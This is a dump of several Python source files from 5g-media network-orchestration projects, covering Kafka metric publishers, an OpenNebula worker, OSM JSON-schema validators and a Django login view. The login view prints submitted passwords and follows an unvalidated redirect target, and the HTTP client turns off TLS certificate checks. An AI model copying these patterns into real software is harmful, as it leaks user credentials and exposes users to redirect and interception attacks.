publish_messages(stream_metrics, mano_data, spectator)
except VduUuidMissRedis as ex:
logger.info(ex)
except (VnfNotFound, InvalidTranscoderId, OsmInfoNotFound) as exc:
logger.warning(exc)
except (VnfNotFound, OsmInfoNotFound) as ex:
logger.warning(ex)
except json.decoder.JSONDecodeError as je:
logger.error("JSONDecodeError: {}".format(je))
except Exception as ex:
logger.exception(ex)
def get_vnf_uuid(redis_connection, stream, topic):
""" Get the VNF uuid, if any
Args:
redis_connection (object): The redis connection object
stream (dict): The stream
topic (str): The Kafka topic
Returns:
str: the VNF uuid
Raises:
InvalidTranscoderId: if the transcoder ID is not valid
VnfNotFound: if VNF uuid does not exist
"""
transcoder_id = stream.get("transcoder_id", None)
if transcoder_id is None:
raise InvalidTranscoderId(
'Invalid transcoder_id value. Its value is {}'.format(transcoder_id))
try:
if int(transcoder_id) == 0:
raise InvalidTranscoderId('Invalid transcoder_id value. Its value is {}'.format(
transcoder_id))
except ValueError:
pass
search_for_transcoder_id = "{}:{}".format(topic, transcoder_id)
cached_vnf_uuid_bytes = redis_connection.get(name=search_for_transcoder_id)
if cached_vnf_uuid_bytes is not None:
vnf_uuid = convert_bytes_to_str(cached_vnf_uuid_bytes)
else:
vnf_uuid = discover_vnf_uuid_by_vnfd_name_index(transcoder_id)
if vnf_uuid is not None:
redis_connection.set(name=search_for_transcoder_id,
value="{}".format(vnf_uuid), ex=300) # 5 minutes
logger.debug("VNF is {} for id {}".format(vnf_uuid, transcoder_id))
quality_id = stream.get("quality_id", None)
if vnf_uuid is None or quality_id is None:
raise VnfNotFound('The VNF uuid does not exist in the consumed message')
vnf_uuid = vnf_uuid.replace(" ", "_")
return vnf_uuid
def generate_payload(translator, redis_connection, topic, vnf_uuid):
""" Get the OSM related data
Args:
translator (object): The translator object
redis_connection (object): The redis connection object
topic (str): The kafka topic
vnf_uuid (str): The VNF uuid
Returns:
dict: The mano-related data
Raises:
OsmInfoNotFound
"""
redis_key = compose_redis_key(topic, vnf_uuid, identifier_type='vnf')
cached_value_bytes = redis_connection.get(name=redis_key)
if cached_value_bytes is not None:
# Load the relevant OSM-info entry from the redis
record = json.loads(convert_bytes_to_str(cached_value_bytes))
if record.get('status', 404) == 404:
raise VduUuidMissRedis(
"OSM data not found in Redis for the VNF uuid: `{}`".format(vnf_uuid))
mano_data = record.get('mano')
logger.debug("Load OSM entry for vTranscoder3D VNF uuid: `{}` from Redis".format(
vnf_uuid))
else:
# Generate a standard structure for each metric
mano_data = translator.get_translation(vnf_uuid)
mano_data_len = len(mano_data)
# Keep status in redis to highlight if a VNF record exists in OSM or not.
# If VNF does not exist use status 404 and ignore it in the next redis read.
if not mano_data_len:
redis_record = {"status": 404}  # 404 means that the VNF uuid does not exist in OSM
else:
redis_record = {"status": 200, "mano": mano_data} # 200 means VNF uuid exists in OSM
logger.debug(
"Load OSM entry for vTranscoder3D VNF uuid: `{}` from OSM".format(vnf_uuid))
# Save the entry in the Redis
redis_connection.set(name=redis_key, value=json.dumps(redis_record),
ex=REDIS_EXPIRATION_SECONDS)
if not mano_data_len:
raise OsmInfoNotFound(
"OSM data not found in OSM API for the VNF uuid: `{}`".format(vnf_uuid))
return mano_data
def publish_messages(metrics, mano_data, spectator):
""" Send the translated metrics in Kafka bus
Args:
metrics (list): The list of metrics
mano_data (dict): The OSM details for the given VNF
spectator (dict): The spectator details (client/group)
"""
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, api_version=KAFKA_API_VERSION,
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
for m in metrics:
adapted_metric = {"metric": m, "mano": mano_data, "spectator": spectator}
t = producer.send(KAFKA_TRANSLATION_TOPIC, adapted_metric)
# Block for 'synchronous' sends for X seconds
try:
t.get(timeout=KAFKA_TIMEOUT)
except KafkaError as ke:
logger.error(ke)
producer.close()
if __name__ == '__main__':
main()
``` |
{
"source": "5g-media/OIDC_ON_OSMr5",
"score": 2
} |
#### File: LW-UI_MODIFIED/authosm/views.py
```python
from django.shortcuts import render
from django.contrib.auth import login, logout, authenticate
from django.http import HttpResponseRedirect
import urllib
from django.conf import settings
# Create your views here.
def user_login(request):
logout(request)
error_message = ''
if request.POST:
print(request.POST.get('username'))
print(request.POST.get('password'))
next_page = request.POST.get('next')
next_page = urllib.unquote(next_page).decode('iso-8859-2')
try:
user = authenticate(username=request.POST.get('username'),
password=request.POST.get('password'),
project_id=request.POST.get('project_id'))
except Exception as e:
print(e)
res = HttpResponseRedirect('/auth')
res.set_cookie('logout_reason', '', max_age=10)
return res
if user and user.is_active:
if user.is_authenticated:
login(request, user)
request.session['projects'] = user.get_projects()
if next_page == "" or next_page is None:
return HttpResponseRedirect('/home')
else:
return HttpResponseRedirect(next_page)
else:
error_message = 'Login failed!'
#return render(request, 'login.html', {'error_message': error_message, 'collapsed_sidebar': False})
return render(request, 'login.html', {'error_message': error_message, 'collapsed_sidebar': False, 'OIDC_URL': settings.OIDC_URL})
```
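The view above passes `settings.OIDC_URL` to the login template; a minimal settings fragment it assumes could look like the following (the URL is a placeholder, not a real endpoint).
```python
# settings.py fragment assumed by the login view above (placeholder value).
OIDC_URL = "https://idp.example.org/auth/realms/osm/protocol/openid-connect/auth"
```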
#### File: NBI/osm_nbi/validation.py
```python
from jsonschema import validate as js_v, exceptions as js_e
from http import HTTPStatus
from copy import deepcopy
__author__ = "<NAME> <<EMAIL>>"
__version__ = "0.1"
version_date = "Mar 2018"
"""
Validator of input data using JSON schemas for those items that not contains an OSM yang information model
"""
# Basis schemas
patern_name = "^[ -~]+$"
shortname_schema = {"type": "string", "minLength": 1, "maxLength": 60, "pattern": "^[^,;()\\.\\$'\"]+$"}
passwd_schema = {"type": "string", "minLength": 1, "maxLength": 60}
name_schema = {"type": "string", "minLength": 1, "maxLength": 255, "pattern": "^[^,;()'\"]+$"}
string_schema = {"type": "string", "minLength": 1, "maxLength": 255}
xml_text_schema = {"type": "string", "minLength": 1, "maxLength": 1000, "pattern": "^[^']+$"}
description_schema = {"type": ["string", "null"], "maxLength": 255, "pattern": "^[^'\"]+$"}
id_schema_fake = {"type": "string", "minLength": 2, "maxLength": 36}
bool_schema = {"type": "boolean"}
null_schema = {"type": "null"}
# "pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
id_schema = {"type": "string", "pattern": "^[a-fA-F0-9]{8}(-[a-fA-F0-9]{4}){3}-[a-fA-F0-9]{12}$"}
time_schema = {"type": "string", "pattern": "^[0-9]{4}-[0-1][0-9]-[0-3][0-9]T[0-2][0-9]([0-5]:){2}"}
pci_schema = {"type": "string", "pattern": "^[0-9a-fA-F]{4}(:[0-9a-fA-F]{2}){2}\\.[0-9a-fA-F]$"}
# allows [] for wildcards. For that reason huge length limit is set
pci_extended_schema = {"type": "string", "pattern": "^[0-9a-fA-F.:-\\[\\]]{12,40}$"}
http_schema = {"type": "string", "pattern": "^https?://[^'\"=]+$"}
bandwidth_schema = {"type": "string", "pattern": "^[0-9]+ *([MG]bps)?$"}
memory_schema = {"type": "string", "pattern": "^[0-9]+ *([MG]i?[Bb])?$"}
integer0_schema = {"type": "integer", "minimum": 0}
integer1_schema = {"type": "integer", "minimum": 1}
path_schema = {"type": "string", "pattern": "^(\\.){0,2}(/[^/\"':{}\\(\\)]+)+$"}
vlan_schema = {"type": "integer", "minimum": 1, "maximum": 4095}
vlan1000_schema = {"type": "integer", "minimum": 1000, "maximum": 4095}
mac_schema = {"type": "string",
"pattern": "^[0-9a-fA-F][02468aceACE](:[0-9a-fA-F]{2}){5}$"} # must be unicast: LSB bit of MSB byte ==0
dpid_Schema = {"type": "string", "pattern": "^[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){7}$"}
# mac_schema={"type":"string", "pattern":"^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$"}
ip_schema = {"type": "string",
"pattern": "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$"}
ip_prefix_schema = {"type": "string",
"pattern": "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}"
"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/(30|[12]?[0-9])$"}
port_schema = {"type": "integer", "minimum": 1, "maximum": 65534}
object_schema = {"type": "object"}
schema_version_2 = {"type": "integer", "minimum": 2, "maximum": 2}
# schema_version_string={"type":"string","enum": ["0.1", "2", "0.2", "3", "0.3"]}
log_level_schema = {"type": "string", "enum": ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]}
checksum_schema = {"type": "string", "pattern": "^[0-9a-fA-F]{32}$"}
size_schema = {"type": "integer", "minimum": 1, "maximum": 100}
array_edition_schema = {
"type": "object",
"patternProperties": {
"^\\$": {}
},
"additionalProperties": False,
"minProperties": 1,
}
nameshort_list_schema = {
"type": "array",
"minItems": 1,
"items": shortname_schema,
}
ns_instantiate_vdu = {
"title": "ns action instantiate input schema for vdu",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"id": name_schema,
"volume": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"name": name_schema,
"vim-volume-id": name_schema,
},
"required": ["name", "vim-volume-id"],
"additionalProperties": False
}
},
"interface": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"name": name_schema,
"ip-address": ip_schema,
"mac-address": mac_schema,
"floating-ip-required": bool_schema,
},
"required": ["name"],
"additionalProperties": False
}
}
},
"required": ["id"],
"additionalProperties": False
}
ip_profile_dns_schema = {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"address": ip_schema,
},
"required": ["address"],
"additionalProperties": False
}
}
ip_profile_dhcp_schema = {
"type": "object",
"properties": {
"enabled": {"type": "boolean"},
"count": integer1_schema,
"start-address": ip_schema
},
"additionalProperties": False,
}
ip_profile_schema = {
"title": "ip profile validation schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"ip-version": {"enum": ["ipv4", "ipv6"]},
"subnet-address": ip_prefix_schema,
"gateway-address": ip_schema,
"dns-server": ip_profile_dns_schema,
"dhcp-params": ip_profile_dhcp_schema,
}
}
ip_profile_update_schema = {
"title": "ip profile validation schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"ip-version": {"enum": ["ipv4", "ipv6"]},
"subnet-address": {"oneOf": [null_schema, ip_prefix_schema]},
"gateway-address": {"oneOf": [null_schema, ip_schema]},
"dns-server": {"oneOf": [null_schema, ip_profile_dns_schema]},
"dhcp-params": {"oneOf": [null_schema, ip_profile_dhcp_schema]},
},
"additionalProperties": False
}
ns_instantiate_internal_vld = {
"title": "ns action instantiate input schema for internal vld",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": name_schema,
"vim-network-name": name_schema,
"vim-network-id": name_schema,
"ip-profile": ip_profile_update_schema,
"internal-connection-point": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"id-ref": name_schema,
"ip-address": ip_schema,
# "mac-address": mac_schema,
},
"required": ["id-ref"],
"minProperties": 2,
"additionalProperties": False
},
}
},
"required": ["name"],
"minProperties": 2,
"additionalProperties": False
}
additional_params_for_vnf = {
"type": "array",
"items": {
"type": "object",
"properties": {
"member-vnf-index": name_schema,
"additionalParams": object_schema,
},
"required": ["member-vnf-index", "additionalParams"],
"additionalProperties": False
}
}
ns_instantiate = {
"title": "ns action instantiate input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsInstanceId": id_schema,
"netsliceInstanceId": id_schema,
"nsName": name_schema,
"nsDescription": {"oneOf": [description_schema, {"type": "null"}]},
"nsdId": id_schema,
"vimAccountId": id_schema,
"additionalParamsForNs": object_schema,
"additionalParamsForVnf": additional_params_for_vnf,
"ssh_keys": {"type": "array", "items": {"type": "string"}},
"nsr_id": id_schema,
"vduImage": name_schema,
"vnf": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"member-vnf-index": name_schema,
"vimAccountId": id_schema,
"vdu": {
"type": "array",
"minItems": 1,
"items": ns_instantiate_vdu,
},
"internal-vld": {
"type": "array",
"minItems": 1,
"items": ns_instantiate_internal_vld
}
},
"required": ["member-vnf-index"],
"minProperties": 2,
"additionalProperties": False
}
},
"vld": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"name": string_schema,
"vim-network-name": {"oneOf": [string_schema, object_schema]},
"vim-network-id": {"oneOf": [string_schema, object_schema]},
"ip-profile": object_schema,
"vnfd-connection-point-ref": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"member-vnf-index-ref": name_schema,
"vnfd-connection-point-ref": name_schema,
"ip-address": ip_schema,
# "mac-address": mac_schema,
},
"required": ["member-vnf-index-ref", "vnfd-connection-point-ref"],
"minProperties": 3,
"additionalProperties": False
},
}
},
"required": ["name"],
"additionalProperties": False
}
},
},
"required": ["nsName", "nsdId", "vimAccountId"],
"additionalProperties": False
}
ns_action = { # TODO for the moment it is only contemplated the vnfd primitive execution
"title": "ns action input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsInstanceId": id_schema,
"member_vnf_index": name_schema,
"vnf_member_index": name_schema, # TODO for backward compatibility. To remove in future
"vdu_id": name_schema,
"primitive": name_schema,
"primitive_params": {"type": "object"},
},
"required": ["primitive", "primitive_params"], # TODO add member_vnf_index
"additionalProperties": False
}
ns_scale = { # TODO for the moment it is only VDU-scaling
"title": "ns scale input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsInstanceId": id_schema,
"scaleType": {"enum": ["SCALE_VNF"]},
"scaleVnfData": {
"type": "object",
"properties": {
"vnfInstanceId": name_schema,
"scaleVnfType": {"enum": ["SCALE_OUT", 'SCALE_IN']},
"scaleByStepData": {
"type": "object",
"properties": {
"scaling-group-descriptor": name_schema,
"member-vnf-index": name_schema,
"scaling-policy": name_schema,
},
"required": ["scaling-group-descriptor", "member-vnf-index"],
"additionalProperties": False
},
},
"required": ["scaleVnfType", "scaleByStepData"], # vnfInstanceId
"additionalProperties": False
},
"scaleTime": time_schema,
},
"required": ["scaleType", "scaleVnfData"],
"additionalProperties": False
}
schema_version = {"type": "string", "enum": ["1.0"]}
schema_type = {"type": "string"}
vim_account_edit_schema = {
"title": "vim_account edit input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": name_schema,
"description": description_schema,
"type": shortname_schema,
"vim": name_schema,
"datacenter": name_schema,
"vim_url": description_schema,
"vim_url_admin": description_schema,
"vim_tenant": name_schema,
"vim_tenant_name": name_schema,
"vim_username": shortname_schema,
"vim_password": <PASSWORD>,
"config": {"type": "object"}
},
"additionalProperties": False
}
vim_account_new_schema = {
"title": "vim_account creation input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"schema_version": schema_version,
"schema_type": schema_type,
"name": name_schema,
"description": description_schema,
"vim": name_schema,
"datacenter": name_schema,
"vim_type": {"enum": ["openstack", "openvim", "vmware", "opennebula", "aws"]},
"vim_url": description_schema,
# "vim_url_admin": description_schema,
# "vim_tenant": name_schema,
"vim_tenant_name": name_schema,
"vim_user": shortname_schema,
"vim_password": <PASSWORD>_schema,
"config": {"type": "object"}
},
"required": ["name", "vim_url", "vim_type", "vim_user", "vim_password", "vim_tenant_name"],
"additionalProperties": False
}
wim_account_edit_schema = {
"title": "wim_account edit input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": name_schema,
"description": description_schema,
"type": shortname_schema,
"wim": name_schema,
"wim_url": description_schema,
"user": shortname_schema,
"password": <PASSWORD>,
"config": {"type": "object"}
},
"additionalProperties": False
}
wim_account_new_schema = {
"title": "wim_account creation input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"schema_version": schema_version,
"schema_type": schema_type,
"name": name_schema,
"description": description_schema,
"wim": name_schema,
"wim_type": {"enum": ["tapi", "onos", "odl", "dynpac"]},
"wim_url": description_schema,
"user": shortname_schema,
"password": <PASSWORD>,
"config": {"type": "object"}
},
"required": ["name", "wim_url", "wim_type"],
"additionalProperties": False
}
sdn_properties = {
"name": name_schema,
"description": description_schema,
"dpid": dpid_Schema,
"ip": ip_schema,
"port": port_schema,
"type": {"type": "string", "enum": ["opendaylight", "floodlight", "onos"]},
"version": {"type": "string", "minLength": 1, "maxLength": 12},
"user": shortname_schema,
"password": <PASSWORD>
}
sdn_new_schema = {
"title": "sdn controller information schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": sdn_properties,
"required": ["name", "port", 'ip', 'dpid', 'type'],
"additionalProperties": False
}
sdn_edit_schema = {
"title": "sdn controller update information schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": sdn_properties,
# "required": ["name", "port", 'ip', 'dpid', 'type'],
"additionalProperties": False
}
sdn_port_mapping_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "sdn port mapping information schema",
"type": "array",
"items": {
"type": "object",
"properties": {
"compute_node": shortname_schema,
"ports": {
"type": "array",
"items": {
"type": "object",
"properties": {
"pci": pci_extended_schema,
"switch_port": shortname_schema,
"switch_mac": mac_schema
},
"required": ["pci"]
}
}
},
"required": ["compute_node", "ports"]
}
}
sdn_external_port_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "External port information",
"type": "object",
"properties": {
"port": {"type": "string", "minLength": 1, "maxLength": 60},
"vlan": vlan_schema,
"mac": mac_schema
},
"required": ["port"]
}
# PDUs
pdu_interface = {
"type": "object",
"properties": {
"name": shortname_schema,
"mgmt": bool_schema,
"type": {"enum": ["overlay", 'underlay']},
"ip-address": ip_schema,
# TODO, add user, password, ssh-key
"mac-address": mac_schema,
"vim-network-name": shortname_schema, # interface is connected to one vim network, or switch port
"vim-network-id": shortname_schema,
# # provide this in case SDN assist must deal with this interface
# "switch-dpid": dpid_Schema,
# "switch-port": shortname_schema,
# "switch-mac": shortname_schema,
# "switch-vlan": vlan_schema,
},
"required": ["name", "mgmt", "ip-address"],
"additionalProperties": False
}
pdu_new_schema = {
"title": "pdu creation input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": shortname_schema,
"type": shortname_schema,
"description": description_schema,
"shared": bool_schema,
"vims": nameshort_list_schema,
"vim_accounts": nameshort_list_schema,
"interfaces": {
"type": "array",
"items": pdu_interface,
"minItems": 1
}
},
"required": ["name", "type", "interfaces"],
"additionalProperties": False
}
pdu_edit_schema = {
"title": "pdu edit input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": shortname_schema,
"type": shortname_schema,
"description": description_schema,
"shared": bool_schema,
"vims": {"oneOf": [array_edition_schema, nameshort_list_schema]},
"vim_accounts": {"oneOf": [array_edition_schema, nameshort_list_schema]},
"interfaces": {"oneOf": [
array_edition_schema,
{
"type": "array",
"items": pdu_interface,
"minItems": 1
}
]}
},
"additionalProperties": False,
"minProperties": 1
}
# USERS
user_new_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "New user schema",
"type": "object",
"properties": {
"username": shortname_schema,
"password": <PASSWORD>,
"projects": nameshort_list_schema,
},
"required": ["username", "password", "projects"],
"additionalProperties": False
}
user_edit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "User edit schema for administrators",
"type": "object",
"properties": {
"password": <PASSWORD>,
"projects": {
"oneOf": [
nameshort_list_schema,
array_edition_schema
]
},
},
"minProperties": 1,
"additionalProperties": False
}
# PROJECTS
project_new_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "New project schema for administrators",
"type": "object",
"properties": {
"name": shortname_schema,
"admin": bool_schema,
},
"required": ["name"],
"additionalProperties": False
}
project_edit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "Project edit schema for administrators",
"type": "object",
"properties": {
"admin": bool_schema,
},
"additionalProperties": False,
"minProperties": 1
}
# GLOBAL SCHEMAS
nbi_new_input_schemas = {
"users": user_new_schema,
"projects": project_new_schema,
"vim_accounts": vim_account_new_schema,
"sdns": sdn_new_schema,
"ns_instantiate": ns_instantiate,
"ns_action": ns_action,
"ns_scale": ns_scale,
"pdus": pdu_new_schema,
}
nbi_edit_input_schemas = {
"users": user_edit_schema,
"projects": project_edit_schema,
"vim_accounts": vim_account_edit_schema,
"sdns": sdn_edit_schema,
"pdus": pdu_edit_schema,
}
# NETSLICE SCHEMAS
nsi_slice_instantiate = deepcopy(ns_instantiate)
nsi_slice_instantiate["title"] = "netslice subnet instantiation params input schema"
nsi_slice_instantiate["properties"]["id"] = name_schema
nsi_slice_instantiate["properties"]["additionalParamsForNsi"] = object_schema
nsi_slice_instantiate["properties"]["additionalParamsForSubnet"] = {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": name_schema,
"additionalParamsForNs": object_schema,
"additionalParamsForVnf": additional_params_for_vnf
},
"required": ["id"],
"additionalProperties": False
}
}
del nsi_slice_instantiate["required"]
del nsi_slice_instantiate["properties"]["additionalParamsForNs"]
del nsi_slice_instantiate["properties"]["additionalParamsForVnf"]
nsi_vld_instantiate = {
"title": "netslice vld instantiation params input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": string_schema,
"vim-network-name": {"oneOf": [string_schema, object_schema]},
"vim-network-id": {"oneOf": [string_schema, object_schema]},
"ip-profile": object_schema,
},
"required": ["name"],
"additionalProperties": False
}
nsi_instantiate = {
"title": "netslice action instantiate input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsiInstanceId": id_schema,
"nsiName": name_schema,
"nsiDescription": {"oneOf": [description_schema, {"type": "null"}]},
"nstId": string_schema,
"vimAccountId": id_schema,
"ssh_keys": {"type": "string"},
"nsi_id": id_schema,
"netslice-subnet": {
"type": "array",
"minItems": 1,
"items": nsi_slice_instantiate
},
"netslice-vld": {
"type": "array",
"minItems": 1,
"items": nsi_vld_instantiate
},
},
"required": ["nsiName", "nstId", "vimAccountId"],
"additionalProperties": False
}
nsi_action = {
}
nsi_terminate = {
}
class ValidationError(Exception):
def __init__(self, message, http_code=HTTPStatus.UNPROCESSABLE_ENTITY):
self.http_code = http_code
Exception.__init__(self, message)
def validate_input(indata, schema_to_use):
"""
Validates input data against json schema
:param indata: user input data. Should be a dictionary
:param schema_to_use: jsonschema to test
:return: None if ok, raises ValidationError exception on error
"""
try:
if schema_to_use:
js_v(indata, schema_to_use)
return None
except js_e.ValidationError as e:
if e.path:
error_pos = "at '" + ":".join(map(str, e.path)) + "'"
else:
error_pos = ""
raise ValidationError("Format error {} '{}' ".format(error_pos, e.message))
except js_e.SchemaError:
raise ValidationError("Bad json schema {}".format(schema_to_use), http_code=HTTPStatus.INTERNAL_SERVER_ERROR)
``` |
{
"source": "5g-media/opennebula-kafka-publisher",
"score": 3
} |
#### File: opennebula-kafka-publisher/httpclient/client.py
```python
import requests
from .baseclient import AbstractClient
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
class Client(AbstractClient):
def __init__(self, verify_ssl_cert=False):
self.verify_ssl_cert = verify_ssl_cert
super(Client, self).__init__()
def post(self, url, headers=None, payload=None, **kwargs):
"""Insert an entity.
Args:
url (str): the endpoint of the web service
headers (dict): the required HTTP headers, e.g., Accept: application/json
payload (str): the xml payload
kwargs (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
"""
response = requests.request("POST", url, data=payload, headers=headers, verify=self.verify_ssl_cert)
return response
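    # --- Illustrative usage (added): how a caller might drive Client.post() ---
    # This module is part of a package (note the relative import above), so the sketch is
    # meant to be read rather than executed here; endpoint and payload are made-up examples.
    #
    #   from httpclient.client import Client
    #   client = Client(verify_ssl_cert=False)
    #   resp = client.post("https://example.org/api",
    #                      headers={"Content-Type": "application/xml"},
    #                      payload="<xml>sample</xml>")
    #   print(resp.status_code)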
```
#### File: 5g-media/opennebula-kafka-publisher/one_worker.py
```python
import json
import logging.config
import time
import schedule
from kafka import KafkaProducer
from kafka.errors import KafkaError
from nbi_api import identity
from utils import get_opennebula_vim_uuid, get_opennebula_vm_ids
from settings import LOGGING, SCHEDULER_MINUTES, KAFKA_API_VERSION, KAFKA_SERVER, KAFKA_OPENNEBULA_TOPIC, \
XML_RPC_SERVER, XML_RPC_SESSION, OSM_ADMIN_CREDENTIALS
from xmlrpc_api.one_vm_info import OneVMInfo
from xmlrpc_api.parser import export_data_from_one_vm_info
from utils import convert_unix_timestamp_to_datetime_str, get_unit_by_metric
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def main():
""" Publish the VNFs related metrics in the KAFKA_OPENNEBULA_TOPIC while
the ones coming from standalone VMs such as the Traffic Manager in the KAFKA_TRAFFIC_MANAGER_TOPIC
Returns:
None
"""
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, api_version=KAFKA_API_VERSION,
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
# Get the UUID of the OpenNebula VIM
token = identity.bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
one_vim_uuid = get_opennebula_vim_uuid(token)
# Get the list of VM ids of the OpenNebula NSs
vm_ids = get_opennebula_vm_ids(token, one_vim_uuid)
    logger.info('The list of VMs {} has been detected given the VIM uuid `{}`'.format(vm_ids, one_vim_uuid))
# Get the metrics for each running VM in OpenNebula instantiated due to the OSM
for vm_id in vm_ids:
# Get the info of the VM by given session and VM id
one_vm_info = OneVMInfo()
response = one_vm_info.get(XML_RPC_SERVER, XML_RPC_SESSION, vm_id)
raw_response = response.text
# Parse the response and keep the monitoring metrics as a dict
monitoring_info, last_poll = export_data_from_one_vm_info(raw_response)
if last_poll is None:
logger.warning("The last poll is {}".format(last_poll))
return
        # Convert the unix time to UTC ISO 8601 format
timestamp = convert_unix_timestamp_to_datetime_str(float(last_poll))
for metric, value in monitoring_info.items():
metric_type = metric.lower()
payload = {"vdu_uuid": vm_id, "type": metric_type, "value": value,
"unit": get_unit_by_metric(metric_type), "timestamp": timestamp}
# Publish the metric
request = producer.send(KAFKA_OPENNEBULA_TOPIC, payload)
try:
# set timeout in 5 sec
request.get(timeout=5)
except KafkaError as ke:
logger.error(ke)
producer.close()
if __name__ == '__main__':
# Retrieve the data every X minutes
schedule.every(int(SCHEDULER_MINUTES)).minutes.do(main)
while True:
schedule.run_pending()
time.sleep(1)
``` |
{
"source": "5g-media/openstack-kafka-publisher",
"score": 2
} |
#### File: openstack-kafka-publisher/kafka_inf/publisher.py
```python
import threading, logging, time
from kafka import KafkaProducer
from kafka.errors import KafkaError
import json
data = {
'source': 'openstack',
'counter_type': 'gauge',
'project_id': '9f89d937198543e6b38a89d8503142d5',
'timestamp': '2018-03-21T16:27:45.273549',
'resource_id': '50a3a175-42a4-42d4-8a10-e0f0cf16c1a0',
'message_id': 'c97bb281-2d24-11e8-9c8a-150e18cb77dc',
'user_id': 'cf180fadfb214e12aa90a5ccafe10383',
'message_signature': 'dd6c21aa535dbc188e9991ea24a889203ca3eb52c5297a04e1bdef09c9905c7b',
'resource_metadata': {
'os_type': 'hvm',
'display_name': 'test',
'image_ref': '6fadef71-6608-4ba2-9cee-671a1aa5edba',
'task_state': '',
'instance_host': 'pike2',
'root_gb': 1,
'state': 'running',
'name': 'instance-00000006',
'memory_mb': 512,
'flavor': {
'swap': 0,
'disk': 1,
'ram': 512,
'vcpus': 1,
'ephemeral': 0,
'name': 'm1.tiny',
'id': '76949218-7a4f-4e7e-8269-f4e24c2832ab'
},
'architecture': 'x86_64',
'vcpus': 1,
'instance_id': '50a3a175-42a4-42d4-8a10-e0f0cf16c1a0',
'disk_gb': 1,
'instance_type': 'm1.tiny',
'ephemeral_gb': 0,
'status': 'active',
'image_ref_url': None,
'cpu_number': 1,
'image': {
'id': '6fadef71-6608-4ba2-9cee-671a1aa5edba'
},
'host': '30b3a202bf71d8651cf49f4aa9232f79e029f87d47c081163fca9d12'
},
'counter_name': 'cpu_util',
'counter_unit': '%',
'monotonic_time': None,
'counter_volume': 2.0722654293387963
}
class Publisher(object):
    def __init__(self, broker_ip_, port_, api_ver_):
        self.broker_url = broker_ip_ + ':' + port_
        self.api_version = api_ver_
    def pubJson(self, msg_, topic_):
        producer = KafkaProducer(bootstrap_servers=self.broker_url, api_version=(1, 1, 0),
                                 value_serializer=lambda v: json.dumps(v).encode('utf-8'))
record_metadata = None
t = producer.send(topic_, msg_)
        # Set a 10 sec timeout for 'synchronous' sends
try:
record_metadata = t.get(timeout=10)
except KafkaError as ex:
# Decide what to do if produce request failed...
pass
if __name__ == "__main__":
while (1):
print(time.time())
        p = Publisher('192.168.1.107', '9092', (1, 10, 1))
p.pubJson(topic_='monitoring1', msg_=data)
time.sleep(0.05)
``` |
{
"source": "5g-media/ss-cno-teleimmersive-game",
"score": 3
} |
#### File: ss-cno-teleimmersive-game/markovdp/exceptions.py
```python
class ParameterError(Exception):
"""Error class for unsupported or missing parameters."""
def __init__(self, message, logger=None):
super(ParameterError, self).__init__(message)
if logger is not None:
logger.error(message)
class StateNotSetError(Exception):
"""Raised when the model is used before setting the initial state."""
def __init__(self, logger=None):
super(StateNotSetError, self).__init__("State has not been set")
if logger is not None:
logger.error("State has not been set")
class InternalError(Exception):
"""Raised for errors that are caused by internal bugs. These will never happen."""
def __init__(self, message, logger=None):
